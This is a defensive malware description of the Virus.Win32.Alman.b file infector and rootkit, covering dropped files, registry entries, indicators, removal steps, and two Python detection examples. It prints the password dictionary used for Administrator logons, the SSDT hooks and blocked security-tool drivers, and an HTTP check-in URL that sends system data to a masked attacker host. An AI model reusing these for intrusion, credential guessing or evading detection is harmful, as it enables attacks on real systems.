Virus.Win32.Alman.b

by Atlantis on April 18th, 2012 in Malware Descriptions.

Detect: Virus.Win32.Alman.b
Platform: Win32
Type: Virus
Virus body size: ~38 KB

Summary

A file-infecting virus that appends itself to Windows PE-EXE executables, drops a kernel-mode rootkit driver to hide its components, and spreads over removable drives and weakly protected network shares.

Technical Details

Installation

When run, the virus drops a dynamic-link library (DLL) from its body into the Windows directory under the name "linkinfo.dll":

%Windir%\linkinfo.dll

The file is 46592 bytes in size.

md5: 38FEE4EC44DF464D5C998629498D6176

In addition, it extracts the following driver from its body:

%System%\drivers\nvmini.sys

The driver is first written to a temporary file named "IsDrv118.sys":

%System%\drivers\IsDrv118.sys

The file is a Windows NT kernel-mode driver, 17152 bytes in size.

md5: 01F4112EE9F2E11B8E952E4FF026B319

To load the dropped driver, the virus registers a service named "nvmini" that starts automatically at every system startup (the display name imitates an NVIDIA driver):

[HKLM\SYSTEM\CurrentControlSet\Services\nvmini]

"DisplayName" = "NVIDIA Compatible Windows Miniport Driver"

"ImagePath" = "%System%\drivers\nvmini.sys"

"Group" = "Pointer Port"

"ErrorControl" = "0"

"Start" = "2"

"Type" = "1"

Propagation

The virus copies its executable to the root of every logical and removable drive under the name "boot.exe":

X:\boot.exe

md5: 54a821b720f0088789e3a98776c5fdd3

It then creates an "autorun.inf" file in the root directory of each drive:

X:\autorun.inf

which runs the virus executable whenever the user opens the infected drive in Windows Explorer (X is the drive letter).

The virus sets the "hidden" attribute on all files it creates.

To spread across the network, the virus tries to log on to remote machines as "Administrator" with each of the following passwords (a plain dictionary attack; a failed-logon burst from one host against the Administrator account is the corresponding sign in the Security log):

password1

monkey

password

abc123

qwerty

letmein

root

mypass123

owner

test123

love

admin123

qwer

!@#$%^&*()

!@#$%^&*(

!@#$%^&*

!@#$%^&

!@#$%^

!@#$%

asdfgh

asdf

!@#$

654321

123456789

12345

Aaa

123

111

1

admin

On success, it copies itself to the remote machine's C$ administrative share as "setup.exe":

C$\setup.exe

File Infection

The virus injects the code of "%Windir%\linkinfo.dll" into the address space of explorer.exe (the name is chosen to collide with the legitimate linkinfo.dll in %System%; a same-named file in %Windir% is found first when explorer.exe resolves the DLL by name). The injected code scans all available logical and network drives, as well as USB flash drives, for files it can infect and infects them.

When infecting a file, the virus enlarges the last PE section of the target, writes its encrypted body into that section, and redirects the entry point (AddressOfEntryPoint) into the appended code so that the virus runs before the original program.
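The infection pattern just described leaves a recognisable trace in the PE headers: the entry point no longer lies in the code section but in the (enlarged) last section. The following is an added example, not code from the original description, showing a minimal PE header parser that flags that pattern. It builds two constructed in-memory PE32 images, one clean and one laid out Alman-style; the infected sample's section flags are an assumption for the sake of the example, not something the page states.

```python
import struct
from collections import namedtuple

# Section header characteristics (PE/COFF specification).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

Section = namedtuple("Section", "name vaddr size chars")


def parse_pe(data):
    """Return (AddressOfEntryPoint, [Section, ...]) from a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    entry = struct.unpack_from("<I", data, opt + 16)[0]  # same offset in PE32 and PE32+
    sections = []
    for i in range(n_sections):
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, raw_size = struct.unpack_from("<III", data, off + 8)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append(Section(name, vaddr, max(vsize, raw_size), chars))
    return entry, sections


def scan_entry_point(data):
    """Heuristic findings typical of an appending infector; empty list means nothing suspicious."""
    entry, sections = parse_pe(data)
    idx = next((i for i, s in enumerate(sections)
                if s.vaddr <= entry < s.vaddr + s.size), None)
    if idx is None:
        return ["entry point 0x%x lies outside every section" % entry]
    s = sections[idx]
    findings = []
    if len(sections) > 1 and idx == len(sections) - 1:
        findings.append("entry point in last section %s" % s.name)
    if not s.chars & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry section %s is not marked executable" % s.name)
    if s.chars & IMAGE_SCN_MEM_WRITE:
        findings.append("entry section %s is writable" % s.name)
    return findings


def build_pe(section_specs, entry_rva):
    """Constructed minimal PE32 image (headers plus zero-filled sections) for testing."""
    n = len(section_specs)
    opt_size = 224  # size of a PE32 optional header
    hdr_end = 0x40 + 4 + 20 + opt_size + 40 * n
    raw_ptr = (hdr_end + 0x1FF) & ~0x1FF  # first section at 0x200 file alignment
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)        # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)  # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<I", opt, 60, raw_ptr)          # SizeOfHeaders
    table, bodies = b"", b""
    for name, vaddr, size, chars in section_specs:
        raw_size = (size + 0x1FF) & ~0x1FF
        table += struct.pack("<8sIIIIIIHHI", name.encode(), size, vaddr,
                             raw_size, raw_ptr, 0, 0, 0, 0, chars)
        bodies += b"\0" * raw_size
        raw_ptr += raw_size
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return image + b"\0" * (((hdr_end + 0x1FF) & ~0x1FF) - hdr_end) + bodies


TEXT = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RSRC = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ

# Constructed clean layout: entry point inside .text.
CLEAN = build_pe([(".text", 0x1000, 0x800, TEXT),
                  (".data", 0x2000, 0x200, DATA),
                  (".rsrc", 0x3000, 0x400, RSRC)], entry_rva=0x1100)

# Constructed Alman-style layout: last section grown by ~38 KB, entry point moved into
# the appended area. Marking the section executable is an assumption, not from the page.
INFECTED = build_pe([(".text", 0x1000, 0x800, TEXT),
                     (".data", 0x2000, 0x200, DATA),
                     (".rsrc", 0x3000, 0x400 + 0x9800, RSRC | IMAGE_SCN_MEM_EXECUTE)],
                    entry_rva=0x3400)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("infected", INFECTED)):
        print(label, scan_entry_point(image) or ["no findings"])
```

The check is a triage heuristic, not a signature: packers and some linkers also place the entry point in the final section, so a hit is a reason to look at the file, not a verdict on its own.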

The virus infects all Windows PE-EXE executables except files with the following names (most of them online-game clients and their updaters):

wooolcfg.exe

woool.exe

ztconfig.exe

patchupdate.exe

trojankiller.exe

xy2player.exe

flyff.exe

xy2.exe

au_unins_web.exe

cabal.exe

cabalmain9x.exe

cabalmain.exe

meteor.exe

patcher.exe

mjonline.exe

config.exe

zuonline.exe

userpic.exe

main.exe

dk2.exe

autoupdate.exe

dbfsupdate.exe

asktao.exe

sealspeed.exe

xlqy2.exe

game.exe

wb-service.exe

nbt-dragonraja2006.exe

dragonraja.exe

mhclient-connect.exe

hs.exe

mts.exe

gc.exe

zfs.exe

neuz.exe

maplestory.exe

nsstarter.exe

nmcosrv.exe

ca.exe

nmservice.exe

kartrider.exe

audition.exe

zhengtu.exe

Detection

The hidden driver can be revealed with an anti-rootkit tool such as GMER, which compares the kernel's reported view with its own raw reads and so exposes the SSDT hooks and hidden files described below.

Payload

To ensure that only one instance runs on a system, the virus creates a mutex with the following name:

PNP#DMUTEX#1#DL5

It terminates the processes of rival malware with the following image names and deletes their files from disk:

sxs.exe

lying.exe

logo1_.exe

logo_1.exe

fuckjacks.exe

spoclsv.exe

nvscv32.exe

svch0st.exe

c0nime.exe

iexpl0re.exe

ssopure.exe

upxdnd.exe

wdfmgr32.exe

spo0lsv.exe

ncscv32.exe

iexplore.exe

iexpl0re.exe

ctmontv.exe

explorer.exe

internat.exe

lsass.exe

smss.exe

svhost32.exe

rundl132.exe

msvce32.exe

rpcs.exe

sysbmw.exe

tempicon.exe

sysload3.exe

run1132.exe

msdccrt.exe

wsvbs.exe

cmdbcs.exe

realschd.exe

A process is only terminated if its image file does not reside in one of the following directories, which is what keeps the legitimate explorer.exe, lsass.exe and smss.exe under \WINDOWS\ from being killed:

\QQ

\WINNT\

\WINDOWS\

LOCAL SETTINGS\TEMP\

The virus fetches a list of files to download from the Internet at the following URL:

http://ftp.db***829.info/ok.gif

The URL was not responding at the time this description was written.

The virus downloads the files named in the list, saves them to the current user's temporary folder and executes them.

It reports to the attacker the free space on the local disk (C:), the OS and Internet Explorer versions, and whether antivirus software is installed on the PC.

The information is sent as query parameters of an HTTP GET request to the attacker's server:

http://info.s***1.com/xxx.asp?action=post&HD=<free space percentage>&OT=<os version>&IV=<IE version>&AV=<drivers installed>
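Because the check-in carries its fields in the query string, it is easy to pick out of proxy or web-gateway logs. The following added example (not part of the original description) runs that detection over a few constructed log lines; the beacon path and parameter names are the ones shown above, while "info.example.com" stands in for the masked attacker host and the log layout is assumed.

```python
from urllib.parse import urlsplit, parse_qs

# Check-in path and parameter names are taken from the description; the attacker's
# host is masked on the page, so "info.example.com" below is only a placeholder.
BEACON_PATH = "/xxx.asp"
BEACON_FIELDS = ("HD", "OT", "IV", "AV")

# Constructed proxy log, one request per line: "<time> <client> <method> <url> <status>".
SAMPLE_PROXY_LOG = """\
2012-04-18T10:21:05Z 10.0.0.15 GET http://www.example.org/index.html 200
2012-04-18T10:21:09Z 10.0.0.15 GET http://info.example.com/xxx.asp?action=post&HD=62&OT=5.1&IV=6.0&AV=0 200
2012-04-18T10:21:11Z 10.0.0.22 GET http://www.example.org/xxx.asp?action=post&HD=1 200
2012-04-18T10:25:40Z 10.0.0.22 GET http://info.example.com/xxx.asp?action=list 200
"""


def parse_beacon(url):
    """Return the check-in fields if url has the Alman.b beacon shape, else None.

    All four parameters must be present: a partial match (third sample line) is
    far more likely to be an unrelated page and is deliberately not flagged.
    """
    parts = urlsplit(url)
    if not parts.path.lower().endswith(BEACON_PATH):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if query.get("action") != ["post"] or any(k not in query for k in BEACON_FIELDS):
        return None
    return {"host": parts.hostname, **{k: query[k][0] for k in BEACON_FIELDS}}


def find_beacons(log_text):
    """Return one record per log line whose URL carries the full check-in query."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed or truncated line
        beacon = parse_beacon(fields[3])
        if beacon:
            hits.append({"time": fields[0], "client": fields[1], **beacon})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_PROXY_LOG):
        print("%(time)s %(client)s -> %(host)s  HD=%(HD)s OT=%(OT)s IV=%(IV)s AV=%(AV)s" % hit)
```

The matched client is the host to isolate and to check for the nvmini service, the dropped DLL and driver, and infected executables.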

In addition, the virus can download an updated copy of itself from the attacker's site. It saves the file under the name "AcLue.dll" in the following directory:

%WinDir%\AppPatch\AcLue.dll

Using the "%System%\drivers\nvmini.sys" driver, the virus hides the following files from directory listings:

nvmini.sys

linkinfo.dll

autorun.inf

boot.exe

The driver also blocks deletion of the registry key that runs the "nvmini" service and refuses to load drivers with the following names, which belong to anti-rootkit, process-inspection and packet-capture tools (among them IceSword, RootkitRevealer, Process Explorer and WinPcap):

ISPUBDRV

ISDRV1

RKREVEAL

PROCEXP

SAFEMON

RKHDRV10

NPF

IRIS

NPPTNT

DUMP_WMIMMC

SPLITTER

EAGLENT

It achieves this by hooking the handlers of the following system services in the KeServiceDescriptorTable (SSDT): the registry hooks protect the service key, NtQueryDirectoryFile hides the files listed above, and NtLoadDriver blocks the security-tool drivers:

NtDeleteKey

NtDeleteValueKey

NtEnumerateKey

NtQueryDirectoryFile

NtLoadDriver

The driver also registers kernel notification callbacks that prevent processes from loading the following DLLs, several of which belong to the rival malware whose processes it terminates:

UPXDHND.DLL

CMDBCS.DLL

WSVBS.DLL

MDDDSCCRT.DLL

RUND11.DLL

LGSYM.DLL

RDSHOST.DLL

RDFHOST.DLL

RDIHOST.DLL

RPCS.DLL

NOTEPAD.DLL

DLLHOSTS.DLL

WINDHCP.DLL

RICHDLL.DLL

DLLWM.DLL

Removal Recommendations

Because the nvmini driver hides the files below and blocks deletion of its service key while it is loaded, carry out these steps from outside the infected system (an offline rescue environment) or after the driver has been neutralised with an anti-rootkit tool such as GMER.

  1. Delete the registry key:

    [HKLM\SYSTEM\CurrentControlSet\Services\nvmini]

    "DisplayName" = "NVIDIA Compatible Windows Miniport Driver"

    "ImagePath" = "%System%\drivers\nvmini.sys"

    "Group" = "Pointer Port"

    "ErrorControl" = "0"

    "Start" = "2"

    "Type" = "1"

  2. Delete the following files:

    %Windir%\linkinfo.dll

    %System%\drivers\nvmini.sys

    %System%\drivers\IsDrv118.sys

    X:\boot.exe

    X:\autorun.inf

    C$\setup.exe

    %WinDir%\AppPatch\AcLue.dll

  3. Delete any remaining copies of the virus from the hard drive.
  4. Run a full scan of your computer using an antivirus program with an up-to-date definition database (Download Ad-Aware Free) so that the PE-EXE files the virus has modified are disinfected; deleting the dropped files alone leaves the infected executables in place.